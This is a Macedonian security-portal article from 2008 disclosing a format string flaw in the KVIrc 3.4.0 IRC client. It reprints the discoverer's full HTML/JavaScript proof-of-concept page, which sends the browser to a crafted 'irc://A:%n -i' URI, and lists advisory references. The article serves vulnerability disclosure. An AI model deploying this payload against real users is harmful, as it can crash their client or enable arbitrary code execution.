IT.com.mk - Македонски ИТ портал - KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Автор: Ѓоко Крстиќ
Објавено на: 27.10.2008
Слабост кај IRC клиентот KVIrc (http://www.kvirc.net) од типот Format String со чија помош може да дојде до извршување на своеволен код или пак Denial of Service. Доказ на концептот: ------------------------------------------------------------------ <!-- KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC) Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVirc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC addicted developers around the world. Product web page: http://www.kvirc.net/ Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm [t00t] gmail [d0t] com http://www.zeroscience.org 24.10.2008 --> <html> <title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title> <head> <body> <center> <br /> <br /> <strong>Warning ! :)</strong> </center> <body bgcolor="#FFFF00"> <script type="text/javascript"> alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008"); function poc() { window.location.href = "irc://A:%n -i"; } var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation"); if (answ == true) { poc(); } else { window.location.href = "http://www.kvirc.net"; } </script> </body> </head> </html> ------------------------------------------------------------------ Слабоста се случува кога наменетата апликација преку интернет прелистувач со адреса: irc://A:%n -i ги изврши дадените аргументи. Аргументот -i се користи за подршка за IPv6, додека format string се случува во делот во доделување на порт односно: irc://IP:PORT [options]. Тест (со претпазливост): http://zeroscience.org/codes/kvirc_fs.html Референти: - http://www.frsirt.com/english/advisories/2008/2926 - http://www.juniper.net/security/auto/vulnerabilities/vuln31912.html - http://www.milw0rm.com/exploits/6832 - http://www.securityfocus.com/bid/31912 - http://secunia.com/advisories/32410/ Клучни зборови: KVIrc Format String PoC Експлоит URI URL

Сподели:

Последни написи на Ѓоко

Mozilla: Проверете ги вашите плагини
објавено на 21.10.2009 во Интернет

Во соработка со Adobe Product Security Incident Response Team (PSIRT)
објавено на 24.08.2009 во Сигурност

Збогување со milw0rm.com
објавено на 08.07.2009 во Интернет

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

Првиот сајт

Првиот веб сајт е создаден со HTML код на 6 Август, 1991 од страна на Тим Бернерс-Ли. На сајтот биле објавени информации за тоа што е WWW и како се користи. Сајтот изгледал нешто слично на ова.

Нема настани во наредните денови.